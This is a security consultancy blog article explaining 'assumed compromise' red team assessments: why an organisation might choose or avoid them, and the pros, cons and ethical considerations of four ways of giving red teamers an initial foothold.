Gemma Moore 25 January, 2024

"Assumed Compromise" Assessments: A Guide

In red teaming, defining the business objectives of the exercise early is essential to driving the best value realisation from the exercise. Each attack simulation involves a bespoke scoping exercise, and it is during these scoping processes that we discuss different ways of potentially achieving the desirable business objectives and the pros and cons of each.  The best red teaming approach for you and your organisation will depend on several factors including the maturity of your controls and your defence teams, the reason you are conducting the attack simulation, your wider business goals and your desired learning outcomes.

There is often a trade-off in red teaming between the 'realism' of a simulation in accurately emulating adversary tactics and other factors such as budget and preventing risk to the target business.  

It's often the case that having analysed the objectives of the business and factored in budgetary constraints, we decide that the best way to approach an attack simulation is to assume that a user account or workstation has already been compromised by an adversary, and therefore take an initial position within the network which is like that of a standard user.

In an 'assumed compromise' simulation, we're answering: Assuming an adversary has already gained a foothold as a user in the network, what could they do?

Why might you avoid 'assumed compromise'?

There are several good reasons why you might want to avoid an 'assumed compromise' starting point for your simulation.  One of the biggest reasons to avoid 'assumed compromise' simulations is to ensure that your attack simulation is as accurate as possible.

Where budget, time constraints and practical limitations allow, a full-chain attack simulation - covering all areas including reconnaissance, target identification, social engineering, delivery of malware and establishment of a persistent foothold – provides a business with robust evidence about how they would be likely to fare against a real attack from a determined and skilled adversary.  As well as helping to identify areas of weakness in technical and procedural controls, a full attack simulation allows a business to accurately benchmark the performance of detection and response teams and therefore to improve response capability.

A downside of using 'assumed compromise' starting points is that the resulting evidential artefacts – which may be examined by the detection and response teams once red team activities have been discovered – might not track all the way back to a 'realistic' initial point of compromise.  If you need your detection and response teams to be able to exercise their processes and procedures against the full chain of an attack, using an 'assumed compromise' exercise might hinder this.

If you have a business requirement to provide a realistic simulation of an attack – either to underpin a business case for investment and funding, or to validate the real-world effectiveness of controls across the whole organisation – choosing a full-chain attack simulation will be the way to go, assuming budget can stretch to it.

If your reason for conducting a simulation is to provide robust evidence of cyber security maturity to a regulator, or to meet compliance requirements, again a full simulation is likely to be more suitable.  In many cases, though, an 'assumed compromise' starting point can provide very valuable intelligence about resilience.

Why would you choose 'assumed compromise'?

If the majority of adversarial breaches start with some form of social engineering or phishing attack, why is a starting point that assumes a compromise even useful?  There are several different reasons why 'assumed compromise' might be the way to go and here are some examples.

A primary case for 'assumed compromise' assessments is where there is a credible worry about the potential for insider threat actors impacting a business.  By definition, the insider threat has a starting position within the organisation – understanding what an adversary could accomplish with this level of access might be the core goal in that case.

Most organisations invest heavily in their perimeter controls.  These controls will usually include mature Endpoint Detection and Response (EDR) solutions deployed to their user workstations and laptops, as well as email filters and web traffic filters.  Since most external breaches tend to be the result of a user falling victim to a phishing attack delivering malware to an endpoint via email or a website, this is entirely logical.  The presence of such strong control sets, however, mean that when exercising a simulation it can be very time-consuming to do full reconnaissance against the different controls in place and construct a technical attack path that will result in the red team gaining a full foothold.  'Time-consuming', in the context of red teaming, generally equates to 'expensive'.  

Similarly, if the red team needs, for its foothold, to create robust social engineering pretexts and convince users to open documents, click links or download software, this can take substantial amounts of time – especially where users identify and report malicious activity, meaning that the red team need to 'burn' their current attack approach and create a new one. 

Social engineering attacks against employees also pose wellbeing challenges that need to be managed when designing pretexts and approaches.  Humans are inherently susceptible to social engineering approaches, and we can reliably hypothesise that where an organisation is being specifically targeted by a determined adversary, that adversary will at some point be able to convince an employee to read a message, or click a link, or download a file to the attacker's advantage.  When we know this with high confidence, including proof of this part of the attack chain during the simulation might not be necessary. In many cases, organisations will already conduct phishing simulations independently to assess the susceptibility of their internal teams to social engineering attacks, that could provide evidence to this fact.  

If the goal for the business is to understand where there are gaps in perimeter coverage that would allow an adversary to introduce malware, open-box exercises such as holistic reviews of technical controls are likely to provide better coverage and be delivered at lower cost than a full-chain red team that involves social engineering and phishing attacks.  Equally, where learning the susceptibility of employees to social engineering is not a goal for the business, it might make sense to remove the social engineering part of the assessment, saving time and therefore budget.

If one of the primary goals for the business is to understand whether a breach in progress within the internal network can be detected and stopped in a timely manner, budgeted time may be better spent exercising against internal network systems rather than examining controls on the perimeter.  There are cases where internal detection and response teams are already well-practiced at responding to intrusions which originate via phishing attacks for example, and there is good confidence in a response team's ability to robustly handle these events.  In those cases, it's often useful to use 'assumed compromise' to answer the question, "assuming an adversary managed to breach the perimeter without us seeing it, would we be able to stop them later on in their attack?"

Isn't it "cheating"?

Yes and no.  

The results of an assumed compromise simulation might be challenged within an organisation, on the basis that the attack team have "cheated" by being granted an initial position in the environment as part of the simulation.  

Whilst, technically, it does give the attack team a shortcut to a foothold, the reality of today's threat environment is that security plans and decisions should be made on the assumption that a breach will occur.  

Even with the best patching regime and a well-hardened build, a workstation breach is only one novel evasion technique or zero-day vulnerability away.  Even with the best user awareness training, a user account compromise is only one lapse of attention away.  

In this context, introducing the attack team so that they can explore the later stages of the attack chain with the benefit of a provided foothold allows us to challenge aspects of detection and response which simply don't get as much practice as the earlier stages of an attack in progress.

What are the options for 'assumed compromise'?

In theory, exercising via an 'assumed compromise' sounds simple – provide the red team with a user account, and let them carry out their attack from that point.  In reality, there are many different options for providing a foothold for assumed compromise, and each of these has associated pros and cons.  

These are some of the most commonly discussed:

Option 1: Ask a user to run some malware on their workstation

An obvious route for an assumed compromise is to ask a user to deliberately download and run a piece of malware within their profile.  That piece of malware would then provide the red team with their foothold in the environment and emulate the access gained by an adversary who had socially-engineered that user.  

This is typically the most realistic way of establishing a facilitated foothold, but it is not without its challenges.

On the positive side:

  • This provides a foothold which is associated with a known, existing internal user account that is fully-functional.
  • The foothold is reasonably representative of that which an adversary would gain were they successful with a social engineering attack against this user.
  • The foothold will provide a reasonably-realistic set of artefacts or indicators for analysis by defenders once the breach is identified

On the negative side:

  • Whilst, technically, the access gained in this type of assumed compromise is identical to that gained during a social engineering compromise, there is a moral distinction between the two.  
    • Where a user falls victim to social engineering, their introduction of the malware is inadvertent.  Where a user voluntarily provides access to the red team in this way, they are likely to be committing contractual and policy breaches which could result in serious consequences for them as an individual.  
    • Similarly, in asking the user to introduce malware to their user account, you are asking them to voluntarily expose their personal data to the red team.  

Ethically, the user needs to consent to this activity whilst fully understanding the potential consequences, and the control group needs to ensure that the user is protected properly from adverse reactions as a result of this.  I have discussed this in more detail elsewhere, but this can become complicated and many users would be understandably reluctant to allow this.

If this route is to be explored, the following considerations are key:

  • A user needs to be identified to participate in the exercise.  The 'ideal' user for this tends to be a mid- to low- level employee who is not directly within the chain of command of any technology or security functions.  (There are exceptions to this rule where scenarios are to be explored surrounding the compromise of a privileged account.)  
  • This user needs to be fully briefed on their role in the exercise, and the amount of access that they will be providing to the red team.  This briefing should include full disclosure about the amount of access to files, messages and data the red team will be provided as a result of the user performing the requested action.
  • The user needs to agree to the level of access being requested, and may also wish to establish rules of engagement for the use of their account.
  • The control group must ensure that the user has robust protection from adverse consequences as a result of their participation in this exercise – this generally means having sign-off from legal and HR stakeholders within the business which provides the user with permission to breach their contract terms and the policies they have agreed to.

Option 2: Create a user account for the red team to use with a standard build workstation or VDI access

Creating a dedicated user account for the red team to act as a starting point for the exercise can be a useful option to consider.

On the positive side:

  • A dedicated user account created for the purposes of the simulation will not have the complications that arise if you choose to use an existing user account.  A dedicated account will not have the same considerations in respect of personal data and established inter-personal relationships that could be impacted or damaged were a real user account nominated.
  • As the red team only have access to this account, there is robust accountability for any activities this account conducts – there is no potential for split responsibilities between a legitimate account owner and the red team for actions conducted.

On the negative side:

  • Precisely because the account is new and has no history in the organisation, the account will be less representative of the position that an adversary might gain from compromising a user account themselves.  The red team won't have access to files and documents in a home directory which might be useful, they won't have access to emails that might reveal information about internal processes and procedures, and they won't have a message history to build upon for lateral movement techniques such as internal phishing, for example.
  • A new account for a fictional worker can be difficult to create with robust Joiners, Movers and Leavers (JML) processes in place – this might mean complicated subterfuge in order to create the account, or reading several new people into the simulation.
  • Depending on the size of the business, new accounts, with names not known to responders, might be subjected to extra scrutiny by response teams – unlike the activities of accounts belonging to familiar individuals.

If you need to create an account for the red team specifically to enable an operation, here are some things that you might need to consider:

  • What are the practical challenges with the JML processes which the control group will need to overcome? For example, what HR processes are involved in account creation?  Usually, onboarding teams within HR departments are the ones who will make the request to create accounts.  Sometimes, a member of these teams can be read into the operation, but often a control group will want to explore ways that this could be bypassed: Can a request to create an account and get hold of a user device be injected later on in the business process to bypass the usual onboarding checks, or are there contractor or third-party account types which are easier to have created?  Can a user device be sent to a remote location easily, or does it need to be collected in person?
  • For any new account to be created during an engagement, it's often helpful to understand the cover story for the creation of the account.  What department are they in, what is their job role and who are they 'reporting' to?  It's not unusual for one of these purpose-created accounts to have to undergo post-enrolment training as part of the onboarding process, and sometimes this also involves conversations with helpdesk and supposed colleagues.  Understanding these processes helps things run smoothly.
  • What name is going to be associated with the account you create?  We would usually recommend that the account is created with a generic sounding name, which will not stand out amongst the user population.  We also recommend that the account created is aligned with the gender of the red team owner for the account – in case a video call or voice call is ever initiated by responders with the account holder.  We don't recommend setting up these accounts with the real names of the members of our red team – it's too easy for responders to research the names of individuals who are part of our teams and can pollute the response by revealing that an incident is part of a controlled exercise when this occurs.  Sometimes, using the real names of the red team might be unavoidable – for example where a device or laptop to be issued to the user will only be issued with an in-person identity check.  What should absolutely be avoided is naming accounts "Pentest Account" or "Security Test Account"!
  • Finally, you need to consider the working environment of the team into which the new user will be placed.  If the team work very closely together, in person or with very regular communications as a team, the introduction of a new user account within the team is likely to be noticed and reported on in a way that could compromise the simulation before it has begun.  

Where the red team have a dedicated account to 'play' with, they can simulate a realistic infection by delivering malware to themselves via the workstation – using email, web or messaging mechanisms.  This can help produce a realistic attack chain demonstration for defenders without involving the data of other individuals.

If you are well-prepared in advance, this type of 'victim' user account could be maintained under cover for a period of time before the simulation starts so that it is not brand new if and when suspicious activity is detected within it.  (In practice, this very rarely happens.)

Option 3: Provide a connection to the internal network with a user account, but no workstation

Where issuing of workstation access or a laptop can be challenging because of the processes and procedures in place, you could consider providing the red team with a connection to an internal network using a device they control, with a purpose-created user account with standard user rights.

On the positive side:

  • As above, the dedicated user account created for the purposes of the simulation will not have the complications that arise if you choose to use an existing user account.  
  • As above, since the red team only have access to this account, there is robust accountability for any activities this account conducts.
  • You can avoid any problems with processes surrounding workstation building and allocation.

On the negative side:

  • To issue a purpose-created account, you still need to content with JML processes and account creation, with all the considerations listed above.
  • You have the same problems as with other newly-created accounts - the account has no history in the organisation, and is less representative of the position that an adversary might gain from compromising a user account themselves.  
  • You need to establish a connection point for the red team into the network, and this might mean bypassing physical security controls in place within office locations, as well as agreeing and understanding remote connectivity mechanisms.
  • Because you have no involvement of a standard build workstation or VDI environment, you can't assess the impact of workstation configurations on the potential attack pathways that an adversary might have.
  • For organisations operating in a zero-trust paradigm or cloud-native environment, it's likely that there simply is no concept of an internal network - and conditional access controls may mean that connection to important services without a registered device is not possible without enrolment of that device, which once again brings into play the complications associated with JML processes.

Option 4: Provide a connection to the internal network without a user account

Your final option, where user accounts simply can't be provided, is generally to allow the red team to connect directly to the network.

On the positive side:

  • This is generally the simplest option to arrange.

On the negative side:

  • Because there is no user account involvement, the starting position for the red team is the least representative of the starting point an adversary is likely to have once they phish a user for access.
  • You need to establish a connection point for the red team into the network, as above, which might involve bypassing security controls.
  • As above, because you have no involvement of a standard build workstation or VDI environment, you can't assess the impact of workstation configurations on the potential attack pathways that an adversary might have.
  • As above, for organisations operating in a zero-trust paradigm or cloud-native environment, it's likely that there simply is no concept of an internal network.

Takeaways

Red teaming is highly flexible.  Whatever your desired business outcomes and learning objectives, there is likely an adversary simulation exercise that can be crafted to your needs, your timescales, and your budget.  

When procuring an adversary simulation, carefully consider your desired learning outcomes and objectives – and where you want the most focus and effort to be.  Is the inclusion of social engineering and phishing going to provide you value for money and do you feel that social engineering is going to provide you with valuable outcomes?  If yes – then carry on!  

If you're not sure whether the return on a full-chain attack will be worth the investment, or if you're concerned about the ability to detect and respond to a breach which has already penetrated your first line of defence, it's certainly worth exploring assumed compromise as a starting point.  This is especially true if you are not so invested in being able to provide a fully realistic end-to-end attack story for stakeholders.

Improve your security

Our experienced team will identify and address your most critical information security concerns.